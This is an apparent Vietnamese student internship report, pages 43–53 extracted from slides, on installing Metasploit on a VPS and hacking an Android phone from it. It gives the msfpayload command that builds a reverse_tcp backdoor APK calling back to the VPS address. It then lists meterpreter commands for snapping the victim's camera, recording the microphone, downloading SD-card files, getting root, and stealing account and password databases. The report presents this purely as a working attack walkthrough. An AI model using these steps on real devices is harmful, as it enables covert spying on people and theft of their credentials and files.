  • 44. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 43 II. Thực hiện trên môi trường internet 1.Cài mã độc trên VPS 1.1 Gi ới thi ệu Metasploit lên VPS - Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service.Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 1.2 Cài đặt - Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community.Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu. -- - Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác. Chọn folder cài đặt:
  • 45. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 44 - Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: - Chọn server và ngày hết hạn, để mặc định:
  • 46. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 45 - Quá trình cài đặt của Metasploit: - Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
  • 47. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 46 - Sau khi Finish trình duyệt web mở lên và đi tới giao diện - Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account:
  • 48. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: Trang 47 2.Từ VPS điều khiển thiết bị qua internet  Các bước thực hi ện 1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS
  • 49. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 48 - Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk”ở đây địa chỉ VPS là 14.0.21.132 2. Khởi động Metasploit Console trên VPS 3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS 4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị hack
  • 50. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 5. Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ Trang 49 Để xem các lệnh ta gõ help Để xem thông tin về máy, nhập lệnh SysInfo Để xem các tác vụ đang chạy gõ ps Xem ip gõ ipconfig Xem danh sách thư mục, file gõ ls
  • 51. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh • Sử dụng camera: - Để xem danh sách camera, nhập webcam_list - Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. • Ghi âm - Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy • Lấy file từ sd card - Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Trang 50 Dùng lệnh cd /sdcard/Download để vào thư mục - Để tải về máy, ta nhập lệnh Download App.apk - Để upload gõ lệnh: upload Và file này sẽ được tải về thư mục root của máy Kali - Gõ shell để vào lệnh - Kiểm tra xem có root chưa gõ su whoami - Nếu báo unknown id is 0 tức là đã root ls -l danh mục file và các quyền cd để chuyển hướng thư mục - Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ - Để xem danh sách và down load các file hay thay đổi các file trong ROM + Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập + Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data
  • 52. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 51 ^C để quay lại - Sử dụng SQLite để mở file db
  • 53. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 52 III. Tổng kết: Kết quả đạt được: Link “slideshare” và “youtube” Báo cáo tuần 1: - Link slideshare: http://www.slideshare.net/lanhle524/hng-dn-cai-t-kali-linux-trn-may-ao-vmwaredocx - Link youtube: https://www.youtube.com/watch?v=xk9q9yaiiXE&feature=youtu.be Báo cáo tuần 2: - Link slideshare: http://www.slideshare.net/lanhle524/tao-ma-c-trn-kali-linux-thm-nhp-android - Link youtube: https://www.youtube.com/watch?v=cswPjYZLhWU&feature=youtu.be Báo cáo tuần 3: - Link slideshare: http://www.slideshare.net/lanhle524/baibaocao3 - Link youtube: https://www.youtube.com/watch?v=Nv4tesZKld0 Báo cáo tuần 4: - Link slideshare: http://www.slideshare.net/lanhle524/baibaocao4-140810141923phpapp02 - Link youtube: https://www.youtube.com/watch?v=yBFbKMYHsSI&feature=youtu.be Báo cáo giữa kì: - Link slideshare: http://www.slideshare.net/lanhle524/bao-cao-giua-ki-39850065 Báo cáo cuối kì: - Link slideshare: Giới thiệu bản thân: - Link youtube: https://www.youtube.com/watch?v=TsgYFipDoyk&feature=youtu.be Thuận lợi – khó khăn: - Link youtube: https://www.youtube.com/watch?v=XQsUt8uZ1pU